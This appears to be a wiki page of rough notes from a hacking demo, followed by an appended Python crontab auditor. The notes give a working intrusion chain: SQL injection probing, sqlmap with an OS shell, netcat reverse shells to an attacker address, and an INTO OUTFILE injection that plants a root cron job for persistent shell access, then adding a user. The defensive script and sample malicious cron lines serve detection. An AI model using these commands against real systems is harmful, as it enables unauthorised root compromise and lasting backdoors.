Hacking: Rough Notes from a Hacking Demo

From OnnoWiki

netdiscover

SQL Injection - GET - POST

GET index.php?id=1' --- if an ERROR comes back, there is a hole

POST username admin password " --- an ERROR means there is an SQL injection hole

Attack

sqlmap -u "url-that-returns-the-error" --data="POSTDATA=taken-from-tamper-data" --batch -v 3 --level=6 --risk=5

sqlmap -u "url-that-returns-the-error" --data="POSTDATA=taken-from-tamper-data" --batch -v 0 (do the remote shell)

os-shell> id, ls

os-shell> whereis nc

os-shell> /bin/nc.traditional ipattacker 9999 -e /bin/sh

on the attacker's computer: nc -lvvp 9999


got a session, id

python -c 'import pty;pty.spawn("/bin/bash")'

exploit

./john


use burpsuite on port 8080 on localhost, intercept off

re-authenticate with a wrong password

burpsuite captures the cookies & session; 200 normal, 300 redirect, 400 error / forbidden

* * * * * root /bin/nc.traditional ipattacker 5555 -e /bin/sh --- this tells root to execute nc

nmap localhost --- check whether the port has been opened


use burpsuite Decoder > Encode as ASCII HEX, copy the ASCII HEX, put it into

use burpsuite Repeater: myusername=admin &mypassword=" 1=1 union select 0x20,0x20 INTO OUTFILE * * * * * root etc. --&Submit=Login

check id in the OS shell over nc: id, root password obtained


useradd domas adduser passwd
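
A defender-side check for the persistence step in these notes (a root line in the system crontab that starts nc with -e /bin/sh), as an added example that is not part of the original notes: it parses /etc/crontab-style lines and flags entries that hand a shell to netcat. The function names, the regular expressions and the sample lines (using the documentation address 192.0.2.10) are constructed for illustration.

```python
import re
import shlex

# Netcat binaries, including Debian's nc.traditional named in the notes above.
NETCAT = re.compile(r"(?:^|/)(?:nc|ncat|netcat)(?:\.(?:traditional|openbsd))?$")
SHELL = re.compile(r"(?:^|/)(?:sh|bash|dash|zsh|ksh)$")
MACRO = re.compile(r"^@(?:reboot|yearly|annually|monthly|weekly|daily|midnight|hourly)$")
ENV_ASSIGNMENT = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*\s*=")


def parse_system_cron(line):
    """Split an /etc/crontab-style line into (schedule, user, command), else None."""
    line = line.strip()
    if not line or line.startswith("#") or ENV_ASSIGNMENT.match(line):
        return None
    fields = line.split()
    n = 1 if MACRO.match(fields[0]) else 5      # @hourly etc. replace the 5 time fields
    if len(fields) < n + 2:                     # need schedule + user + command
        return None
    return " ".join(fields[:n]), fields[n], line.split(None, n + 1)[n + 1]


def shell_over_network(command):
    """True if a netcat binary is started with -e/-c naming a shell."""
    try:
        argv = shlex.split(command)
    except ValueError:                          # unbalanced quotes
        argv = command.split()
    for i, arg in enumerate(argv):
        if NETCAT.search(arg):
            for opt, val in zip(argv[i + 1:], argv[i + 2:]):
                if opt in ("-e", "-c") and SHELL.search((val.split() or [""])[0]):
                    return True
    return False


def audit(crontab_text):
    """Return (line_no, user, command) for every entry that hands a shell to netcat."""
    parsed = ((no, parse_system_cron(raw)) for no, raw in enumerate(crontab_text.splitlines(), 1))
    return [(no, e[1], e[2]) for no, e in parsed if e and shell_over_network(e[2])]


# Constructed sample (192.0.2.10 is a documentation address), not data from the page.
SAMPLE = """\
SHELL=/bin/sh
17 * * * * root cd / && run-parts --report /etc/cron.hourly
* * * * * root /bin/nc.traditional 192.0.2.10 5555 -e /bin/sh
@hourly root /bin/nc.traditional 192.0.2.10 9999 -e /bin/sh
"""
```

Run audit() over the contents of /etc/crontab and each file in /etc/cron.d. The INTO OUTFILE write that plants such a line needs MySQL's FILE privilege and a permissive secure_file_priv setting, so both are worth checking on the database host.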